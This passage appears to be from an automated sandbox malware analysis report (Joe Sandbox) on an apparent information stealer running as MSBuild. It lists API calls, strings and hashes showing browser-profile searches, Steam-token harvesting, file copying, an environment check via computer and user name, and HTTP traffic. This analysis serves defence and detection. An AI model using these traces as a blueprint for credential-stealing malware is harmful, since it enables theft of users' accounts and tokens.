                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                              • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,00E38BE0,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                              • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                            • String ID: $$Opera GX
                                                                                                                                                                                                                                                                            • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                                            • Opcode ID: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                            • Instruction ID: 80cc4b7ed22ef5f98a5cc857f1ea2cbded4609870464dcecd3af56b3405bc9c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68128070901248EACB14EBE5D945ADDBBB9AF19304F14817EE905732D2DB782B0CC7A6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-272486606
                                                                                                                                                                                                                                                                            • Opcode ID: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                            • Instruction ID: 269e7effacccc3b88f2b0db5f774b9eadeb94123610fb6cb7fcf78a80ad87f18
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CB13774900248DFCB24DFA9C581ADEBBF5BF48304F10856EE946A3791D774AA08CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413E40
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                                                                            • String ID: ERROR
                                                                                                                                                                                                                                                                            • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 1815705353-2579291623
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CAB3095
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CB3F688,00001000), ref: 6CAB35D5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAB35E0
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CAB35FD
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAB363F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAB369F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB35A0: __aulldiv.LIBCMT ref: 6CAB36E4
                                                                                                                                                                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAB309F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5B85
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: EnterCriticalSection.KERNEL32(6CB3F688,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5B90
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: LeaveCriticalSection.KERNEL32(6CB3F688,?,?,?,6CAD56EE,?,00000001), ref: 6CAD5BD8
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5B50: GetTickCount64.KERNEL32 ref: 6CAD5BE4
                                                                                                                                                                                                                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CAB30BE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CAB3127
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB30F0: __aulldiv.LIBCMT ref: 6CAB3140
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB2A: __onexit.LIBCMT ref: 6CAEAB30
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2098570390-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,vk@,?,?,?,?,00406B76,?,?,?,?,00000000), ref: 00406A95
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                            • String ID: vk@
                                                                                                                                                                                                                                                                            • API String ID: 544645111-1609055756
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                            • String ID: .kB
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID: *@
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00427383,?,00000000,004225D0,000000FF,?,00418244,?), ref: 004155C7
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004155DF
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                                                                            • String ID: @<A
                                                                                                                                                                                                                                                                            • API String ID: 3494564517-4260584491
                                                                                                                                                                                                                                                                            • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                            • Instruction ID: ca1a9253186f1b5ee703eb257632d364ba5c8053fd628161870718111730db74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EF05C3A3007111783120B9D88405A7F79EFFC6E11704012BDB68CB3A4C931DC4042E0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040822B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040823F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                            • Instruction ID: ea5c140e8df150c45b94e9dcb21e72039a34b19554562d26b54438b66e46b29d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24B17C70801248EACB14EBA4D951BEDBBB9AF19304F54417EE506732D2DB786B0CC765
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00417867
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E391B8), ref: 00417886
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,00E39A50), ref: 004176A3
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: CopyFileA.KERNEL32(?,?,00000001), ref: 004176FF
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: DeleteFileA.KERNEL32(?), ref: 0041777D
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
